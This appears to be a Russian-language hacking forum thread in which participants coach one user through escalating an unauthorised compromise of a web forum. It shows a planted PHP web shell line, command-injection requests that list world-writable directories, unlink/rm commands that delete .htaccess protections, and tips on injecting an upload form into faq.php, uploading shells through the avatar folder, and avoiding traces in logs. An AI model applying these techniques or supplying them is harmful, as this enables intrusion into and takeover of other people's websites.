Не думаю, что кто-то возьмется за это.
Это же звездец мне кажется геморрой.

Шелл есть в темплейтах
system($_REQUEST[c])
просто я не знаю куда еще шелл залить.
ПС доступ к админке пока тоже есть

сделай такой запрос - покажет все возможные папки на запись:

&c=system('cd ../; find . -perm -2 -type d -ls');

тьфу, у тебя там уже систем, тогда так:

?c=cd%20../;%20find%20.%20-perm%20-2%20-type%20d%20-ls

я уже делал но эта злая собака .httaccses мешается( везде

т.е. во всех папках с правами на запись есть .htaccess, запрещающий выполнение php-кода?

хз, можно попробовать отредактировать файлы в корне форума, откуда уж php точно выполняется. Если прав хватит. Просто вставить форму загрузки например в faq.php посредством определенного php-кода через твой шелл в темплейте. Опять же если правов хватает

а можно подробней, как же отредактировать тот же faq.php через шелл? Если такое возможно то может просто через запрос удалить аксес, а дальше по средствам wget'а заливать шелл

ну дык и удаляй .htaccess, чо ты думаешь

unlink('/абсолютный_путь_до_папки/.htaccess'); - через php
rm /абсолютный_путь_до_папки/.htaccess - через system

опять же если хватит прав

непрактило, может еще есть способы залить в эту сраку шелл?
И проверьте правильно ли я вообще запрос wget'a кидаю

причем здесь кеш вообще? А что, папку с авами отменили? Зайди на любую тему в форуме и посмотри свойства авы любого участника - туда и лей, и никаких вгетов, для начала хоть phpinfo.php туда запиши. А то шелл не залил еще, а свой сайт с шеллом уже в логах оставил